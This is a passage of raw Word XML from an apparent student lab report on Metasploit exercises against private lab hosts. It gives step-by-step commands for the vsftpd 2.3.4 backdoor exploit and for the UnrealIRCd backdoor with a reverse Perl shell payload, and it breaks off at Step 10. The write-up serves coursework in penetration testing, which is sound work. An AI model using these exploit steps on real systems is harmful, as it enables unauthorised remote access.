      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ascertained from the </w:t>
      </w:r>
      <w:r w:rsidR="00D8215D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>met-</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>report</w:t>
      </w:r>
      <w:r w:rsidR="000F753B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Lab 4</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008876D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008876D9" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r w:rsidR="003A3F37" w:rsidRPr="003A3F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="003A3F37" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A3F37" w:rsidRPr="003A3F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>service postgresql</w:t>
      </w:r>
      <w:r w:rsidR="003A3F37" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A3F37" w:rsidRPr="003A3F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00572DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00572DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfdb</w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00572DC6" w:rsidRPr="00572DC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="000B3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>step 5: search vsftpd</w:t>
      </w:r>
      <w:r w:rsidR="00C83FB8" w:rsidRPr="00C83FB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81483E" w14:textId="72DF323F" w:rsidR="000F4C1B" w:rsidRDefault="000F4C1B" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow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81644FC" wp14:editId="77979132">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6237</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3509010" cy="728980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20885"/>
                <wp:lineTo x="21459" y="20885"/>
                <wp:lineTo x="2145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0DF32" w14:textId="0CAA242D" w:rsidR="000F4C1B" w:rsidRDefault="000F4C1B" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763A934F" w14:textId="77777777" w:rsidR="000F4C1B" w:rsidRDefault="000F4C1B" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A38C86C" w14:textId="63BD707A" w:rsidR="000F4C1B" w:rsidRDefault="00C83FB8" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="000B3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00AE748F" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F55CB2" w14:textId="10167D77" w:rsidR="000F4C1B" w:rsidRDefault="000F4C1B" w:rsidP="00BB049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72C7D814" wp14:editId="5E05A496">
            <wp:extent cx="3530747" cy="435769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6739" cy="4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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 7: show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AF498" w14:textId="6FB7E5F1" w:rsidR="000F4C1B" w:rsidRDefault="000F4C1B" w:rsidP="00BB049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7CFD4097" wp14:editId="0CE73E35">
            <wp:extent cx="4373172" cy="813974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187" cy="8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11A" w14:textId="77777777" w:rsidR="0075632E" w:rsidRDefault="000F4C1B" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 8: set payload</w:t>
      </w:r>
      <w:r w:rsidR="00AE748F" w:rsidRPr="00E775BA"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>cmd/unix/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14BA3C" w14:textId="77777777" w:rsidR="0075632E" w:rsidRDefault="0075632E" w:rsidP="00BB049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3CCADE3E" wp14:editId="1806D692">
            <wp:extent cx="4461003" cy="432954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13" cy="48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8356" w14:textId="4BBA02AC" w:rsidR="00B9329E" w:rsidRDefault="00B9329E" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow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77F2C52" wp14:editId="5EA61A3A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-21142</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>242703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3990340" cy="1336040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21251"/>
                <wp:lineTo x="21449" y="21251"/>
                <wp:lineTo x="2144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632E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 9: show options</w:t>
      </w:r>
      <w:r w:rsidR="0075632E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7A9063" w14:textId="77777777" w:rsidR="00B9329E" w:rsidRDefault="00B9329E" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04EFAEDC" w14:textId="77777777" w:rsidR="00B9329E" w:rsidRDefault="00B9329E" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C98E19" w14:textId="77777777" w:rsidR="00B9329E" w:rsidRDefault="00B9329E" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACFB031" w14:textId="77777777" w:rsidR="00B9329E" w:rsidRDefault="00B9329E" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312D147C" w14:textId="77777777" w:rsidR="00B9329E" w:rsidRDefault="00AE748F" w:rsidP="00BB049D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="000B3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: set rhosts 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F93D27D" w14:textId="0D98A195" w:rsidR="00BB049D" w:rsidRPr="00124498" w:rsidRDefault="00B9329E" w:rsidP="00BB049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2DF9FED2" wp14:editId="3C18C6C1">
            <wp:extent cx="5731510" cy="3625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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AE748F" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="000B3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00AE748F" w:rsidRPr="00E775BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: exploit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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EFDE8BD" wp14:editId="595CD09E">
            <wp:extent cx="4022303" cy="760699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9982" cy="7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0DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000770DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000770DA" w:rsidRPr="00617CB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Note: set payload was automatically done because no other payloads were available</w:t>
      </w:r>
      <w:r w:rsidR="0032169D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, therefore set payload was unnecessary</w:t>
      </w:r>
      <w:r w:rsidR="000770DA" w:rsidRPr="00617CB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF0430" w14:textId="22F42331" w:rsidR="00BB049D" w:rsidRPr="00BB049D" w:rsidRDefault="00BB049D" w:rsidP="00BB049D">
      <w:r w:rsidRPr="00BB049D">
        <w:t xml:space="preserve">b) Include a screenshot on your success. This screenshot should include the results of executing the following commands: 'id' and 'hostname'. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C0E1B9" w14:textId="6603A793" w:rsidR="00C83FB8" w:rsidRDefault="00617CB1" w:rsidP="00C83FB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3540A9C4" wp14:editId="06BAB943">
            <wp:extent cx="4919809" cy="31243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808" cy="31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CC6D" w14:textId="6A532D0A" w:rsidR="00FC2E01" w:rsidRPr="00FC2E01" w:rsidRDefault="00FD0F8E" w:rsidP="00FC2E01">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B05D318" w14:textId="283BFDDF" w:rsidR="003E7576" w:rsidRPr="003E7576" w:rsidRDefault="00FC2E01" w:rsidP="003E7576">
      <w:r w:rsidRPr="00FC2E01">
        <w:t xml:space="preserve">3.1 Follow lecture slides to conduct this attack. The difference is that you should set the 'cmd/unix/reverse_perl' as the payload instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDBA4ED" w14:textId="4780835A" w:rsidR="00DF671C" w:rsidRPr="003E7576" w:rsidRDefault="003E7576" w:rsidP="006F5FA0">
      <w:r w:rsidRPr="003E7576">
        <w:t xml:space="preserve">a) Include every step with the command lines involved into your lab report. </w:t>
      </w:r>
      <w:r w:rsidR="003D6AFE">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D6AFE">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D6AFE" w:rsidRPr="003D6AFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 1: sudo service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF33725" w14:textId="56C3634D" w:rsidR="00DF671C" w:rsidRPr="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74FE4116" wp14:editId="4D6AB88C">
            <wp:extent cx="2415496" cy="472784"/>
            <wp:effectExtent l="0" t="0" r="444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0396" cy="5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AFE">
        <w:br/>
      </w:r>
      <w:r w:rsidR="002457AB" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="003D6AFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="002457AB" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FC2E01" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="002457AB" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BA13F" w14:textId="20C5556B" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow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11B308C7" wp14:editId="15DB99AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-37410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7286</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1820333" cy="1575094"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21426"/>
                <wp:lineTo x="21479" y="21426"/>
                <wp:lineTo x="2147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333" cy="1575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C48DB" w14:textId="44266AAC" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D717FD" w14:textId="26BFEDAC" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0DB222" w14:textId="02803243" w:rsidR="00DF671C" w:rsidRDefault="00D2086A" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F71969" w14:textId="77777777" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F187D8" w14:textId="77777777" w:rsidR="00DF671C" w:rsidRDefault="00B70202" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="003D6AFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: search unreal_irc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDD85A" w14:textId="77777777" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0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6C50C305" wp14:editId="61AED126">
            <wp:extent cx="5504699" cy="919686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1915" cy="9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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002A0439" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="003D6AFE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="002A0439" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008734C5" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637585E1" w14:textId="77777777" w:rsidR="00DF671C" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0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2425E4D8" wp14:editId="306B3188">
            <wp:extent cx="3070904" cy="25517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2092" cy="30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30A8" w14:textId="77777777" w:rsidR="00FD4237" w:rsidRDefault="00DF671C" w:rsidP="006F5FA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Step 5: show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE86019" w14:textId="63D0D8D4" w:rsidR="00021299" w:rsidRDefault="00FD4237" w:rsidP="006F5FA0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092C9AD0" wp14:editId="7C252E44">
            <wp:extent cx="3984836" cy="114167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7837" cy="116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71C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="002457AB" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="002457AB" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E35E25" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>set payload cmd/unix/reverse_perl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38990D29" wp14:editId="6351EA2E">
            <wp:extent cx="5731510" cy="2870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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 7: show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D71F09" w14:textId="08F96CD5" w:rsidR="00C93D90" w:rsidRDefault="00021299" w:rsidP="006F5FA0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15FAD03E" wp14:editId="03C10965">
            <wp:extent cx="3341541" cy="12209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1666" cy="123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25" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00E35E25" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: set </w:t>
      </w:r>
      <w:r w:rsidR="00C6076C" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>rhosts 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B935A3" w14:textId="47B3B608" w:rsidR="006F5FA0" w:rsidRDefault="00C93D90" w:rsidP="006F5FA0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089E4BE8" wp14:editId="6F9FFC05">
            <wp:extent cx="4054016" cy="247032"/>
            <wp:effectExtent l="0" t="0" r="381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9243" cy="2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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00C6076C" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00021299">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00C6076C" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: set lhost 192.168.1.102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28308A83" wp14:editId="5C99609A">
            <wp:extent cx="4104845" cy="237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1993" cy="31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highlight w:val="yellow"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BE1B6D" w:rsidRPr="00577AED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00021299">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00BE1B6D" w:rsidRPr="00577AED">
        <w:rPr>
